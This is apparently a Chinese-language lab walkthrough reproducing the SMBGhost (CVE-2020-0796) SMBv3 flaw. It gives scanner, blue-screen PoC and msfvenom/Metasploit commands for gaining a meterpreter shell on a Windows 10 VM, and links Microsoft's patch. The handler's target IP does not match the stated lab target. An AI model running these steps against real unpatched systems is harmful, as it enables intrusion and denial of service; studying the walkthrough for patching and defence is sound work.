前言:
Microsoft Windows和Microsoft Windows Server都是美國微軟(Microsoft)公司的產品,Microsoft Windows是一套個人設備使用的操作系統,Microsoft Windows Server是一套服務器操作系統,Server Message Block是其中的一個服務器信息傳輸協議。
微軟公佈了在Server Message Block 3.0(SMBv3)中發現的“蠕蟲型”預授權遠程代碼執行漏洞。
影響版本:
適用於32位系統的Windows 10版本1903
Windows 10 1903版(用於基於x64的系統)
Windows 10 1903版(用於基於ARM64的系統)
Windows Server 1903版(服務器核心安裝)
適用於32位系統的Windows 10版本1909
Windows 10版本1909(用於基於x64的系統)
Windows 10 1909版(用於基於ARM64的系統)
Windows Server版本1909(服務器核心安裝)
系統版本查看:
漏洞復現:
靶機:win10虛擬機、ip:192.168.142.129(防火牆關閉)
攻擊機:kali虛擬機、ip:192.168.142.128
1:檢測系統是否存在漏洞
git下載地址:https://github.com/ollypwn/SMBGhost
python3 scanner.py 目標ip地址
2:藍屏POC:
POC下載地址:https://github.com/eerykitty/CVE-2020-0796-PoC
python3 setup.py install
python3 CVE-2020-0796.py 目標ip地址
3:提權POC提權:
POC下載地址:https://github.com/danigargu/CVE-2020-0796
第一步:msf生成反向連接木馬:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
第二步:替換POC中exploit.py中USER_PAYLOAD的代碼,並且將buf修改爲USER_PAYLOAD
第三步:啓動msf
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444 //監聽端口
set rhost 192.168.1.143 //目標主機
run
第四步:運行poc,自動建立連接
修復方式:
微軟已經發布了此漏洞的安全補丁,訪問如下鏈接:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796